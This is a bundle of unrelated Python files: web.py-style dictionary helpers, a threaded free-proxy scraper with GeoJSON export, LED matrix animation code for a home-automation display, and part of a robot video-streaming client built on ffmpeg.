PY3 = (sys.version_info >= (3,))
class Storage(dict):
"""
from web.py
对字典进行扩展,使其支持通过 dict.a形式访问以代替dict['a']
"""
def __getattr__(self, key):
try:
return self[key]
except KeyError, k:
raise AttributeError, k
def __setattr__(self, key, value):
self[key] = value
def __delattr__(self, key):
try:
del self[key]
except KeyError, k:
raise AttributeError, k
def __repr__(self):
return '<Storage ' + dict.__repr__(self) + '>'
storage = Storage
def storify(mapping, *requireds, **defaults):
"""
Creates a `storage` object from dictionary `mapping`, raising `KeyError` if
d doesn't have all of the keys in `requireds` and using the default
values for keys found in `defaults`.
For example, `storify({'a':1, 'c':3}, b=2, c=0)` will return the equivalent of
`storage({'a':1, 'b':2, 'c':3})`.
If a `storify` value is a list (e.g. multiple values in a form submission),
`storify` returns the last element of the list, unless the key appears in
`defaults` as a list. Thus:
>>> storify({'a':[1, 2]}).a
2
>>> storify({'a':[1, 2]}, a=[]).a
[1, 2]
>>> storify({'a':1}, a=[]).a
[1]
>>> storify({}, a=[]).a
[]
Similarly, if the value has a `value` attribute, `storify will return _its_
value, unless the key appears in `defaults` as a dictionary.
>>> storify({'a':storage(value=1)}).a
1
>>> storify({'a':storage(value=1)}, a={}).a
<Storage {'value': 1}>
>>> storify({}, a={}).a
{}
Optionally, keyword parameter `_unicode` can be passed to convert all values to unicode.
>>> storify({'x': 'a'}, _unicode=True)
<Storage {'x': u'a'}>
>>> storify({'x': storage(value='a')}, x={}, _unicode=True)
<Storage {'x': <Storage {'value': 'a'}>}>
>>> storify({'x': storage(value='a')}, _unicode=True)
<Storage {'x': u'a'}>
"""
_unicode = defaults.pop('_unicode', False)
# if _unicode is callable object, use it convert a string to unicode.
to_unicode = safeunicode
if _unicode is not False and hasattr(_unicode, "__call__"):
to_unicode = _unicode
def unicodify(s):
if _unicode and isinstance(s, str):
return to_unicode(s)
else:
return s
def getvalue(x):
if hasattr(x, 'file') and hasattr(x, 'value'):
return x.value
elif hasattr(x, 'value'):
return unicodify(x.value)
else:
return unicodify(x)
stor = Storage()
for key in requireds + tuple(mapping.keys()):
value = mapping[key]
if isinstance(value, list):
if isinstance(defaults.get(key), list):
value = [getvalue(x) for x in value]
else:
value = value[-1]
if not isinstance(defaults.get(key), dict):
value = getvalue(value)
if isinstance(defaults.get(key), list) and not isinstance(value, list):
value = [value]
setattr(stor, key, value)
for (key, value) in defaults.iteritems():
result = value
if hasattr(stor, key):
result = stor[key]
if value == () and not isinstance(result, tuple):
result = (result,)
setattr(stor, key, result)
return stor
class SortedDict(dict):
"""
A dictionary that keeps its keys in the order in which they're inserted.
"""
def __new__(cls, *args, **kwargs):
instance = super(SortedDict, cls).__new__(cls, *args, **kwargs)
instance.keyOrder = []
return instance
def __init__(self, data=None):
if data is None or isinstance(data, dict):
data = data or []
super(SortedDict, self).__init__(data)
self.keyOrder = list(data) if data else []
else:
super(SortedDict, self).__init__()
super_set = super(SortedDict, self).__setitem__
for key, value in data:
# Take the ordering from first key
if key not in self:
self.keyOrder.append(key)
# But override with last value in data (dict() does this)
super_set(key, value)
def __deepcopy__(self, memo):
return self.__class__([(key, copy.deepcopy(value, memo))
for key, value in self.items()])
def __copy__(self):
# The Python's default copy implementation will alter the state
# of self. The reason for this seems complex but is likely related to
# subclassing dict.
return self.copy()
def __setitem__(self, key, value):
if key not in self:
self.keyOrder.append(key)
super(SortedDict, self).__setitem__(key, value)
def __delitem__(self, key):
super(SortedDict, self).__delitem__(key)
self.keyOrder.remove(key)
def __iter__(self):
return iter(self.keyOrder)
def __reversed__(self):
return reversed(self.keyOrder)
def pop(self, k, *args):
result = super(SortedDict, self).pop(k, *args)
try:
self.keyOrder.remove(k)
except ValueError:
# Key wasn't in the dictionary in the first place. No problem.
pass
return result
def popitem(self):
result = super(SortedDict, self).popitem()
self.keyOrder.remove(result[0])
return result
def _iteritems(self):
for key in self.keyOrder:
yield key, self[key]
def _iterkeys(self):
for key in self.keyOrder:
yield key
def _itervalues(self):
for key in self.keyOrder:
yield self[key]
if PY3:
items = _iteritems
keys = _iterkeys
values = _itervalues
else:
iteritems = _iteritems
iterkeys = _iterkeys
itervalues = _itervalues
def items(self):
return [(k, self[k]) for k in self.keyOrder]
def keys(self):
return self.keyOrder[:]
def values(self):
return [self[k] for k in self.keyOrder]
def update(self, dict_):
for k, v in dict_.iteritems():
self[k] = v
def setdefault(self, key, default):
if key not in self:
self.keyOrder.append(key)
return super(SortedDict, self).setdefault(key, default)
def value_for_index(self, index):
"""Returns the value of the item at the given zero-based index."""
# This, and insert() are deprecated because they cannot be implemented
# using collections.OrderedDict (Python 2.7 and up), which we'll
# eventually switch to
warnings.warn(
"SortedDict.value_for_index is deprecated", PendingDeprecationWarning,
stacklevel=2
)
return self[self.keyOrder[index]]
def insert(self, index, key, value):
"""Inserts the key, value pair before the item with the given index."""
warnings.warn(
"SortedDict.insert is deprecated", PendingDeprecationWarning,
stacklevel=2
)
if key in self.keyOrder:
n = self.keyOrder.index(key)
del self.keyOrder[n]
if n < index:
index -= 1
self.keyOrder.insert(index, key)
super(SortedDict, self).__setitem__(key, value)
def copy(self):
"""Returns a copy of this object."""
# This way of initializing the copy means it works for subclasses, too.
return self.__class__(self)
def __repr__(self):
"""
Replaces the normal dict.__repr__ with a version that returns the keys
in their sorted order.
"""
return '{%s}' % ', '.join(['%r: %r' % (k, v) for k, v in self.iteritems()])
def clear(self):
super(SortedDict, self).clear()
self.keyOrder = []
sorteddict = SortedDict
class ThreadedDict(threadlocal):
"""
Thread local storage.
>>> d = ThreadedDict()
>>> d.x = 1
>>> d.x
1
>>> import threading
>>> def f(): d.x = 2
...
>>> t = threading.Thread(target=f)
>>> t.start()
>>> t.join()
>>> d.x
1
"""
_instances = set()
def __init__(self):
ThreadedDict._instances.add(self)
def __del__(self):
ThreadedDict._instances.remove(self)
def __hash__(self):
return id(self)
def clear_all():
"""Clears all ThreadedDict instances.
"""
for t in list(ThreadedDict._instances):
t.clear()
clear_all = staticmethod(clear_all)
# Define all these methods to more or less fully emulate dict -- attribute access
# is built into threading.local.
def __getitem__(self, key):
return self.__dict__[key]
def __setitem__(self, key, value):
self.__dict__[key] = value
def __delitem__(self, key):
del self.__dict__[key]
def __contains__(self, key):
return key in self.__dict__
has_key = __contains__
def clear(self):
self.__dict__.clear()
def copy(self):
return self.__dict__.copy()
def get(self, key, default=None):
return self.__dict__.get(key, default)
def items(self):
return self.__dict__.items()
def iteritems(self):
return self.__dict__.iteritems()
def keys(self):
return self.__dict__.keys()
def iterkeys(self):
return self.__dict__.iterkeys()
iter = iterkeys
def values(self):
return self.__dict__.values()
def itervalues(self):
return self.__dict__.itervalues()
def pop(self, key, *args):
return self.__dict__.pop(key, *args)
def popitem(self):
return self.__dict__.popitem()
def setdefault(self, key, default=None):
return self.__dict__.setdefault(key, default)
def update(self, *args, **kwargs):
self.__dict__.update(*args, **kwargs)
def __repr__(self):
return '<ThreadedDict %r>' % self.__dict__
__str__ = __repr__
|
getProxy.py |
import threading
import requests
import os
import platform
import json
import datetime
from pydoc import locate
from colorama import Fore,init
init()
__dirname = os.path.abspath(os.path.dirname(__file__))
RDIR = ["logs"] # rewuired directorys
for DIR in RDIR:
if not os.path.isdir(__dirname+'/'+DIR):
os.mkdir(__dirname+'/'+DIR)
# Fix print issue when using Threading
s_print_lock = threading.Lock()
def s_print(*a, **b):
"""Thread safe print function"""
with s_print_lock:
print(*a, **b)
def PingCheckFunc(Enabled,host):
if not Enabled: # Shortcut if the check is disabled.
return True
else:
silence = " >/dev/null 2>&1" if str(platform.system() == 'Linux') else " >nul 2>&1"
response = os.system("ping "+("-c" if str(platform.system() == "Linux") else "-n ")+"1 " + host+silence)
if response == 0:
return True
else:
return False
def GetProxy(ThreadNo,ProxyList,ProxyListSplit,ProxyCount,MaxRequestFails,PingCheck,ForceLinuxOutput,ExportGeoJson,GeoJson):
"""Main Function for scraping proxys from the free api."""
fails = 0
i = 0
if str(platform.system() == "Linux") or ForceLinuxOutput:
spaces = "\033[0H" + ("\n"*(ThreadNo+1))
else:
spaces = ""
while i < ProxyCount:
try:
s = requests.get("https://public.freeproxyapi.com/api/Proxy/Medium")
if s.status_code == 200 and fails < MaxFails:
res = s.json()
# ["Anonymous","Elite"] are the only proxy types usefull, the others are snitches.
if res['isAlive'] == True and res['proxyLevel'] in ["Anonymous","Elite"]: # just skip the proxy if it's considered 'dead', i dont value this as error.
proxy = str(res['host'])+":"+str(res['port'])
if ProxyList.count(proxy) == 0 and PingCheckFunc(PingCheck,res['host']):
ProxyList.append(proxy)
i = i + 1
s_print(spaces+Fore.GREEN+"Thread["+str(ThreadNo)+"] Got["+str(i)+"]: "+str(res['host'])+":"+str(res['port'])+(" "*10))
if ProxyListSplit['enabled'] == True: # Splitting and collecting more information.
# Create Basic data sructure if needed.
# [ True,Finnland: {'Socks4': { 'Elite':{ 'x.x.x.x:xxxx':'lan;lon' }, 'Anonymouse':{ 'x.x.x.x:xxxx':'lan;lon' } } } ]
if not res['countryName'] in ProxyListSplit:
ProxyListSplit[res['countryName']] = {}
if not res['type'] in ProxyListSplit[res['countryName']]:
ProxyListSplit[res['countryName']][res['type']] = {}
if not res['proxyLevel'] in ProxyListSplit[res['countryName']][res['type']]:
ProxyListSplit[res['countryName']][res['type']][res['proxyLevel']] = {}
proxy = str(res['host'])+":"+str(res['port'])
pos = str(res['latitude']) + ";" + str(res['longitude'])
ProxyListSplit[res['countryName']][res['type']][res['proxyLevel']][proxy] = pos
if ExportGeoJson:
CProxy = {} # current Proxy
CProxy['type'] = 'Feature'
CProxy['properties'] = {}
CProxy['properties']['name'] = res['host']
CProxy['properties']['address'] = res['countryName']
CProxy['properties']['marker-color'] = '#FF0000'
CProxy['geometry'] = {}
CProxy['geometry']['type'] = 'Point'
CProxy['geometry']['coordinates'] = []
(CProxy['geometry']['coordinates']).append(res['longitude'])
(CProxy['geometry']['coordinates']).append(res['latitude'])
(GeoJson['features']).append(CProxy)
elif fails >= MaxRequestFails:
i = ProxyCount
break
elif s.status_code != 200:
raise ConnectionError("s.status_code: "+str(s.status_code))
except Exception as err:
fails = fails + 1
s_print(spaces+Fore.RED+"Thread["+str(ThreadNo)+"] Failed."+Fore.RESET)
LOGFILE = __dirname+"/logs/Thread["+str(ThreadNo)+"].log"
MODE = 'a' if os.path.isfile(LOGFILE) else 'w'
with open(LOGFILE,MODE,encoding='utf-8') as log:
log.write(str(err)+"\n")
s_print(spaces+Fore.YELLOW+"Thread["+str(ThreadNo)+"] Finished Job."+(" "*20))
def setup():
options = {'Threads':'int','Proxy Count':'int','Max Fails':'int','Ping Check':'bool','Split Lists?':'bool','Export Advanced':'bool','Force Linux Output':'bool','Export Geo.Json':'bool'}
settings = [1,10,2,False,False,False,False,True]
print("Just use 'enter' to use default Value shown in the []")
for i, e in enumerate(options):
#for e in options:
res = input(e+" ("+options[e]+") ["+str(settings[i])+"]: ")
if res.replace(" ","") != "":
tmp = locate(options[e])
valid = False
while not valid:
try:
tmp(res)
settings[i] = tmp(res)
valid = True
except:
valid = False
os.system('cls' if os.name == 'nt' else 'clear')
return settings #Threads, ProxyLoopCount, MaxFails, PingCheck
if __name__ == '__main__':
try:
Threads, ProxyLoopCount, MaxFails, PingCheck, SplitLists, AdvancedOutput, ForceLinuxOutput, ExportGeoJson = setup()
ProxyListShared = [] # all Proxys
ProxyListSplit = {} # Proxy List with there type.
TasksList = [] # List with all Threads, to 'Sync' them later
GeoJson = {} if ExportGeoJson else None
if ExportGeoJson: # build the frame for the geoJson
GeoJson['type'] = 'FeatureCollection'
GeoJson['features'] = []
ProxyListSplit['enabled'] = (True if SplitLists else True if AdvancedOutput else False)
for i in range(Threads):
CT = threading.Thread(target=GetProxy, args=(i,ProxyListShared,ProxyListSplit,int(round(ProxyLoopCount / Threads,0)),MaxFails,PingCheck,ForceLinuxOutput,ExportGeoJson,GeoJson,),daemon=True )
TasksList.append(CT)
CT.start()
for Task in TasksList:
Task.join()
if str(platform.system() == "Linux") or ForceLinuxOutput: # Cursor position only works on linux as expected. (sometimes works on windows sometimes not.)
spaces = "\033[0H" + ("\n"*(Threads+1)) # line reset with spacing.
else:
spaces = ""
print(spaces+"Result: "+str(len(ProxyListShared))+"/"+str(ProxyLoopCount)+" Proxys, saving...")
# Percentage of fullfilling the requested Proxys
PRC = (len(ProxyListShared) / ProxyLoopCount) * 100 # what we got / what we wanted * 100
print(str(round(PRC,2))+"% Sucess rate.") # round to 2 digits.
print("") # just get some space :P
MODE = 'a' if os.path.isfile('AllProxys.txt') else 'w' # we just append if the file exist, to now override existing proxys.
with open('AllProxys.txt',MODE,encoding='utf-8') as FinalSync:
for proxy in ProxyListShared:
FinalSync.write(proxy+"\n")
if AdvancedOutput:
if not os.path.isdir('advancedExport'):
os.mkdir('advancedExport')
print(spaces+"Dumping advanced output...")
date_time = datetime.datetime.now()
Filename = str(date_time.strftime("%Y-%m-%d %H_%M_%S"))
Filename = Filename.replace(" ","_")
with open(__dirname+'/advancedExport/'+Filename+".json",'w',encoding='utf-8') as AOut:
AOut.write(json.dumps(ProxyListSplit))
if ExportGeoJson:
if not os.path.isdir('geoExport'):
os.mkdir('geoExport')
date_time = datetime.datetime.now()
Filename = str(date_time.strftime("%Y-%m-%d %H_%M_%S"))
Filename = Filename.replace(" ","_")
with open(__dirname+'/geoExport/'+Filename+".json",'w',encoding='utf-8') as AOut:
AOut.write(json.dumps(GeoJson))
print("\n"+spaces+Fore.RESET)
except KeyboardInterrupt:
exit() # it happend for me, exit alone dont work so ill quit if it's not working
quit()
except Exception as err:
LOGFILE = __dirname+"/logs/Main.log" # main error
MODE = 'a' if os.path.isfile(LOGFILE) else 'w'
with open(LOGFILE,MODE,encoding='utf-8') as log:
log.write(str(err)+"\n")
|
ledmatrix8x8.py | #!/usr/bin/python3
''' Test Bed for Diyhas System Status class '''
import time
from threading import Thread
import random
from Adafruit_Python_LED_Backpack.Adafruit_LED_Backpack import BicolorMatrix8x8
FIBINACCI_MODE = 0
PRIME_MODE = 1
WOPR_MODE = 2
IDLE_MODE = 3
FIRE_MODE = 4
PANIC_MODE = 5
BLACK = 0
GREEN = 1
YELLOW = 3
RED = 2
MAX_DEMO_DISPLAY = 300
MIN_DEMO_DISPLAY = 150
PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67,
71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149,
151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229,
233, 239, 241, 251]
class ModeController:
''' control changing modes. note Fire and Panic are externally controlled. '''
def __init__(self, lock):
''' create mode control variables '''
self.bus_lock = lock
self.current_mode = FIBINACCI_MODE
self.start_time = time.time()
def set(self, mode):
''' set or override the mode '''
self.bus_lock.acquire(True)
self.current_mode = mode
self.start_time = time.time()
self.bus_lock.release()
def get(self,):
return self.current_mode
def evaluate(self,):
''' initialize and start the fibinnocci display '''
self.bus_lock.acquire(True)
if self.current_mode != FIRE_MODE:
if self.current_mode != PANIC_MODE:
if self.current_mode != IDLE_MODE:
now_time = time.time()
elapsed = now_time - self.start_time
if elapsed > 30:
self.current_mode = self.current_mode +1
self.start_time = now_time
if self.current_mode > WOPR_MODE:
self.current_mode = FIBINACCI_MODE
self.bus_lock.release()
class FibDisplay:
'''
Fibinocci diplay on an 8x8 matrix. Represents 1 to largest 64 bit
fibinocci number
'''
def __init__(self, matrix8x8, lock):
''' create the fibinacci object '''
self.matrix = matrix8x8
self.bus_lock = lock
self.iterations = 0
self.fib1 = 1
self.fib2 = 1
self.fib3 = 2
def activate(self,):
''' initialize and start the fibinnocci display '''
self.bus_lock.acquire(True)
self.iterations = 0
self.fib1 = 1
self.fib2 = 1
self.fib3 = 2
self.matrix.set_brightness(5)
self.bus_lock.release()
def display(self,):
''' display the fibinocci series as a 64 bit image '''
time.sleep(0.2)
self.bus_lock.acquire(True)
# self.matrix.clear()
for ypixel in range(0, 8):
for xpixel in range(0, 8):
self.iterations += 1
if self.iterations >= 4:
self.iterations = 1
# reg = self.fib3 >> (8 * xpixel)
# bit = reg & (1 << ypixel)
reg = self.fib3 >> (8 * xpixel)
bit = reg & (1 << ypixel)
if bit == 0:
self.matrix.set_pixel(ypixel, xpixel, 0)
else:
self.matrix.set_pixel(ypixel, xpixel, self.iterations)
# print("x=", xpixel ," y=", ypixel)
self.matrix.write_display()
self.fib1 = self.fib2
self.fib2 = self.fib3
self.fib3 = self.fib1 + self.fib2
if self.fib3 > 7540113804746346429:
self.fib1 = 1
self.fib2 = 1
self.fib3 = 2
self.bus_lock.release()
class IdleDisplay:
'''
Idle diplay on an 8x8 matrix. A slowly moving pixel.
'''
def __init__(self, matrix8x8, lock):
''' create the idle object '''
self.matrix = matrix8x8
self.bus_lock = lock
self.xpixel = 7
self.ypixel = 7
def activate(self,):
''' initialize and start the idle display '''
self.bus_lock.acquire(True)
self.xpixel = 7
self.ypixel = 7
self.matrix.set_brightness(8)
self.bus_lock.release()
def display(self,):
''' display the moving pixel '''
time.sleep(1.0)
self.bus_lock.acquire(True)
self.matrix.clear()
self.matrix.set_pixel(self.xpixel, self.ypixel, 0)
self.ypixel -= 1
if self.ypixel < 0:
self.ypixel = 7
self.xpixel -= 1
if self.xpixel < 0:
self.xpixel = 7
self.matrix.set_pixel(self.xpixel, self.ypixel, 1)
self.matrix.write_display()
self.bus_lock.release()
class FlasherDisplay:
'''
Flashing display on an 8x8 matrix. Full screen color.
'''
def __init__(self, matrix8x8, lock, color):
''' create the idle object '''
self.matrix = matrix8x8
self.bus_lock = lock
self.pixel_color = color
self.toggle = True
def activate(self,):
''' initialize and start the idle display '''
self.bus_lock.acquire(True)
self.toggle = True
self.matrix.set_brightness(15)
self.bus_lock.release()
def display(self,):
''' display the moving pixel '''
time.sleep(0.5)
self.bus_lock.acquire(True)
if self.toggle:
color = self.pixel_color
self.toggle = False
else:
color = BLACK
self.toggle = True
for xpixel in range(0, 8):
for ypixel in range(0, 8):
self.matrix.set_pixel(xpixel, ypixel, color)
self.matrix.write_display()
self.bus_lock.release()
class PrimeDisplay:
'''
Prime numbers less than 256 display on an 8x8 matrix.
'''
def __init__(self, matrix8x8, lock):
''' create the prime object '''
self.matrix = matrix8x8
self.bus_lock = lock
self.index = 0
self.row = 0
self.iterations = 0
def activate(self,):
''' initialize and start the prime number display '''
self.bus_lock.acquire(True)
self.index = 0
self.row = 0
self.iterations = 0
self.matrix.set_brightness(15)
self.bus_lock.release()
def display(self,):
time.sleep(0.2)
self.bus_lock.acquire(True)
self.matrix.clear()
self.index += 1
if self.index >= len(PRIMES):
self.index = 0
self.row = 0
number = PRIMES[self.index]
row = self.row
self.row += 1
if self.row >= 8:
self.row = 0
for xpixel in range(0, 8):
bit = number & (1 << xpixel)
if self.iterations == 3:
self.iterations = 1
else:
self.iterations += 1
if bit == 0:
self.matrix.set_pixel(row, xpixel, 0)
else:
self.matrix.set_pixel(row, xpixel, self.iterations)
self.matrix.write_display()
self.bus_lock.release()
class WoprDisplay:
'''
Wargames movie computer on an 8x8 matrix.
'''
def __init__(self, matrix8x8, lock):
''' create the prime object '''
self.matrix = matrix8x8
self.bus_lock = lock
def activate(self,):
''' initialize and start the idle display '''
self.bus_lock.acquire(True)
self.matrix.set_brightness(15)
self.bus_lock.release()
def display(self,):
time.sleep(0.5)
self.bus_lock.acquire(True)
self.matrix.clear()
for xpixel in range(0, 8):
for ypixel in range(7, 4, -1):
bit = random.randint(0, 2)
if bit == 0:
self.matrix.set_pixel(ypixel, xpixel, BLACK)
else:
self.matrix.set_pixel(ypixel, xpixel, RED)
for xpixel in range(0, 8):
for ypixel in range(4, 2, -1):
bit = random.randint(0, 2)
if bit == 0:
self.matrix.set_pixel(ypixel, xpixel, BLACK)
else:
self.matrix.set_pixel(ypixel, xpixel, YELLOW)
for xpixel in range(0, 8):
for ypixel in range(2, 1, -1):
bit = random.randint(0, 2)
if bit == 0:
self.matrix.set_pixel(ypixel, xpixel, BLACK)
else:
self.matrix.set_pixel(ypixel, xpixel, RED)
for xpixel in range(0, 8):
for ypixel in range(1, -1, -1):
bit = random.randint(0,2)
if bit == 0:
self.matrix.set_pixel(ypixel, xpixel, BLACK)
else:
self.matrix.set_pixel(ypixel, xpixel, YELLOW)
self.matrix.write_display()
self.bus_lock.release()
class LedMatrix8x8:
'''
8x8 lED matrix operations for a diyhas
'''
def __init__(self, lock):
''' init the 8x8 LED matrix display '''
self.matrix = BicolorMatrix8x8.BicolorMatrix8x8(address=0x70)
self.matrix.begin()
self.bus_lock = lock
self.mode_controller = ModeController(self.bus_lock)
self.fib = FibDisplay(self.matrix, self.bus_lock)
self.fib.activate()
self.idle = IdleDisplay(self.matrix, self.bus_lock)
self.idle.activate()
self.fire = FlasherDisplay(self.matrix, self.bus_lock, RED)
self.fire.activate()
self.panic = FlasherDisplay(self.matrix, self.bus_lock, YELLOW)
self.panic.activate()
self.prime = PrimeDisplay(self.matrix, self.bus_lock)
self.prime.activate()
self.wopr = WoprDisplay(self.matrix, self.bus_lock)
self.wopr.activate()
self.matrix8x8_thread = Thread(target=self.matrix8x8_timed_update)
self.matrix8x8_thread.daemon = True
def matrix8x8_timed_update(self,):
''' update the matrix 8x8 based on mode '''
while True:
mode = self.mode_controller.get()
if mode == FIBINACCI_MODE:
self.fib.display()
elif mode == IDLE_MODE:
self.idle.display()
elif mode == FIRE_MODE:
self.fire.display()
elif mode == PANIC_MODE:
self.panic.display()
elif mode == PRIME_MODE:
self.prime.display()
elif mode == WOPR_MODE:
self.wopr.display()
self.mode_controller.evaluate()
def set_mode(self, mode, override=False):
''' set display mode '''
if override:
self.mode_controller.set(mode)
current_mode = self.mode_controller.get()
if current_mode == FIRE_MODE or current_mode == PANIC_MODE:
return
self.mode_controller.set(mode)
def run(self):
''' start the matrix 8x8 display updates '''
self.matrix8x8_thread.start()
if __name__ == '__main__':
exit()
|
send_video.py | import subprocess
import shlex
import re
import os
import time
import platform
import json
import sys
import base64
import random
import datetime
import traceback
import robot_util
import _thread
import copy
import argparse
import audio_util
import urllib.request
import rtc_signalling
from subprocess import Popen, PIPE
from threading import Thread
from queue import Queue
#from Queue import Queue # Python 2
import video_util
try:
from usb.core import find as finddev
except:
print("usb MODULE IMPORT FAILED, TRY INSTALLING WITH pip")
class DummyProcess:
def poll(self):
return None
def __init__(self):
self.pid = 123456789
parser = argparse.ArgumentParser(description='robot control')
parser.add_argument('camera_id')
parser.add_argument('video_device_number', default=0, type=int)
parser.add_argument('--api-url', help="Server that robot will connect to listen for API update events", default='https://api.robotstreamer.com')
parser.add_argument('--xres', type=int, default=768)
parser.add_argument('--yres', type=int, default=432)
parser.add_argument('--audio-device-number', default=1, type=int)
parser.add_argument('--audio-device-name')
parser.add_argument('--audio-rate', default="32000", help="examples: 44100 or 48000 or 16000,32000 it will alternate if comma delimited, this helped make a C920 work for whatever reason")
parser.add_argument('--kbps', default=350, type=int)
parser.add_argument('--kbps-audio', default=64, type=int)
parser.add_argument('--framerate', default=25, type=int)
parser.add_argument('--protocol', default='jsmpeg', help="options: jsmpeg, H264, VP8")
parser.add_argument('--h264preset', default='ultrafast')
parser.add_argument('--h264extraParams', default='-tune zerolatency')
parser.add_argument('--h264codecParams', default='nal-hrd=cbr:keyint=50')
parser.add_argument('--VPXextraParams', default='')
parser.add_argument('--brightness', type=int, help='camera brightness')
parser.add_argument('--contrast', type=int, help='camera contrast')
parser.add_argument('--saturation', type=int, help='camera saturation')
parser.add_argument('--rotate180', default=False, type=bool, help='rotate image 180 degrees')
parser.add_argument('--env', default="prod")
parser.add_argument('--screen-capture', dest='screen_capture', action='store_true') # tells windows to pull from different camera, this should just be replaced with a video input device option
parser.set_defaults(screen_capture=False)
parser.add_argument('--no-mic', dest='mic_enabled', action='store_false')
parser.set_defaults(mic_enabled=True)
parser.add_argument('--restart-on-video-fail', dest='restart_on_video_fail', action='store_true')
parser.set_defaults(restart_on_video_fail=False)
parser.add_argument('--no-audio-restart', dest='audio_restart_enabled', action='store_false')
parser.set_defaults(audio_restart_enabled=True)
parser.add_argument('--no-camera', dest='camera_enabled', action='store_false')
parser.set_defaults(camera_enabled=True)
parser.add_argument('--dry-run', dest='dry_run', action='store_true')
parser.add_argument('--mic-channels', type=int, help='microphone channels, typically 1 or 2', default=1)
parser.add_argument('--audio-input-device', default='Microphone (HD Webcam C270)') # currently, this option is only used for windows screen capture
parser.add_argument('--stream-key', default='hellobluecat')
parser.add_argument('--ffmpeg-path', default='/usr/local/bin/ffmpeg')
parser.add_argument('--usb-reset-id', default=None)
charCount = {}
lastCharCount = None
commandArgs = parser.parse_args()
#print("sleeping")
#time.sleep(commandArgs.video_device_number * 2) # this is so they don't run at the same time if you start many simultaneously
#workingVideoDevices = video_util.findWorkingVideoDevices()
robotSettings = None
resolutionChanged = False
currentXres = None
currentYres = None
apiServer = commandArgs.api_url
websocketSFU = None
audioProcess = None
videoProcess = None
#from socketIO_client import SocketIO, LoggingNamespace
# enable raspicam driver in case a raspicam is being used
os.system("sudo modprobe bcm2835-v4l2")
def sayInfo(message):
f = open("/tmp/tempfile", "w")
f.write(message)
f.close()
os.system("espeak -a 20 -p 160 -f /tmp/tempfile -ven-sc+f3 test --stdout | aplay -D plughw:3,0")
os.unlink("/tmp/tempfile")
def reader(pipe, queue):
try:
with pipe:
#for line in iter(pipe.readline, b''):
# queue.put((pipe, line))
while True:
c = pipe.read(1)
if not c:
print("End of file")
break
#print("Read a character:", c)
queue.put((pipe, c))
finally:
queue.put(None)
def printOutput(label, q):
global charCount
charCount[label] = 0
for _ in range(2):
for source, line in iter(q.get, None):
print(line.decode("utf-8"), end="")
charCount[label] += 1
#print(label + "(" + str(charCount[label]) + ")", end="")
#print("%s %s: %s" % (label, source, line))
def runAndMonitor(label, command):
process = Popen(command, stdout=PIPE, stderr=PIPE, bufsize=1)
q = Queue()
Thread(target=reader, args=[process.stdout, q]).start()
Thread(target=reader, args=[process.stderr, q]).start()
Thread(target=printOutput, args=[label, q]).start()
return process
def getVideoEndpoint():
url = '%s/v1/get_endpoint/jsmpeg_video_capture/%s' % (apiServer, commandArgs.camera_id)
response = robot_util.getWithRetry(url)
return json.loads(response)
def getAudioEndpoint():
url = '%s/v1/get_endpoint/jsmpeg_audio_capture/%s' % (apiServer, commandArgs.camera_id)
response = robot_util.getWithRetry(url)
return json.loads(response)
def getVideoSFU():
url = '%s/v1/get_endpoint/webrtc_sfu/100' % (apiServer)
response = robot_util.getWithRetry(url)
return json.loads(response)
def getOnlineRobotSettings(robotID):
url = '%s/api/v1/robots/%s' % (apiServer, robotID)
response = robot_util.getWithRetry(url)
return json.loads(response)
def randomSleep():
"""A short wait is good for quick recovery, but sometimes a longer delay is needed or it will just keep
trying and failing short intervals, like because the system thinks the port is still in use and every retry
makes the system think it's still in use. So, this has a high likelihood of picking a short interval,
but will pick a long one sometimes."""
timeToWait = random.choice((0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 1))
t = timeToWait * 12.0
print("sleeping", t, "seconds")
time.sleep(t)
def startVideoCaptureLinux():
videoEndpoint = getVideoEndpoint()
videoHost = videoEndpoint['host']
videoPort = videoEndpoint['port']
print("start video capture, video endpoint:", videoEndpoint)
# set brightness
if (robotSettings.brightness is not None):
print("brightness")
os.system("v4l2-ctl -c brightness={brightness}".format(brightness=robotSettings.brightness))
# set contrast
if (robotSettings.contrast is not None):
print("contrast")
os.system("v4l2-ctl -c contrast={contrast}".format(contrast=robotSettings.contrast))
# set saturation
if (robotSettings.saturation is not None):
print("saturation")
os.system("v4l2-ctl -c saturation={saturation}".format(saturation=robotSettings.saturation))
videoCommandLine = '{ffmpeg_path} -f v4l2 -framerate 25 -video_size {xres}x{yres} -r 25 -i /dev/video{video_device_number} {rotation_option} \
-f mpegts -codec:v mpeg1video -b:v {kbps}k -bf 0 -muxdelay 0.001 http://{video_host}:{video_port}/{stream_key}/{xres}/{yres}/'\
.format(ffmpeg_path=robotSettings.ffmpeg_path, video_device_number=robotSettings.video_device_number, rotation_option=rotationOption(),\
kbps=robotSettings.kbps, video_host=videoHost, video_port=videoPort, xres=robotSettings.xres, yres=robotSettings.yres, stream_key=robotSettings.stream_key)
print(videoCommandLine)
#return subprocess.Popen(shlex.split(videoCommandLine))
return runAndMonitor("video", shlex.split(videoCommandLine))
startAudioCounter = 0
def startAudioCaptureLinux():
global startAudioCounter
audioEndpoint = getAudioEndpoint()
audioHost = audioEndpoint['host']
audioPort = audioEndpoint['port']
# if a comma delimited list of rates is given, this
# switches the rate each time this is called. for some reason this makes a C920 work more reliably
# particularly on cornbot
if ',' in robotSettings.audio_rate:
rates = robotSettings.audio_rate.split(',')
audioRate = int(rates[startAudioCounter % len(rates)])
startAudioCounter += 1
else:
audioRate = int(robotSettings.audio_rate)
audioDevNum = robotSettings.audio_device_number
if robotSettings.audio_device_name is not None:
audioDevNum = audio_util.getAudioRecordingDeviceByName(robotSettings.audio_device_name)
if audioDevNum is None:
raise Exception("the name doesn't exist" + robotSettings.audio_device_name)
print((robotSettings.ffmpeg_path, audioRate, robotSettings.mic_channels, audioDevNum, audioHost, audioPort, robotSettings.stream_key))
#audioCommandLine = '%s -f alsa -ar 44100 -ac %d -i hw:%d -f mpegts -codec:a mp2 -b:a 32k -muxdelay 0.001 http://%s:%s/%s/640/480/' % (robotSettings.ffmpeg_path, robotSettings.mic_channels, audioDevNum, audioHost, audioEndpoint['port'], robotSettings.stream_key)
